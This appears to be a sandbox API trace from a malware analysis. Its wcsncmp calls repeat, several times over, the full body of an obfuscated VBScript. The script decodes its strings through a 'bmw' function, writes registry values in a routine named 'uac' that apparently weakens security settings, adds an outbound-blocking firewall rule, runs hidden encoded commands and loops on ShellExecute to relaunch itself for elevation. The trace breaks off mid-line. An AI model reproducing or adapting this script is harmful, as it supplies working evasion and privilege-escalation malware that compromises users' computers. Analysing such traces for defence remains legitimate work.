bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.008] wcsncmp (_String1="s.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.008] wcsncmp (_String1=".Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0223.008] wcsncmp (_String1="Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0223.008] wcsncmp (_String1="emove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.008] wcsncmp (_String1="move rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 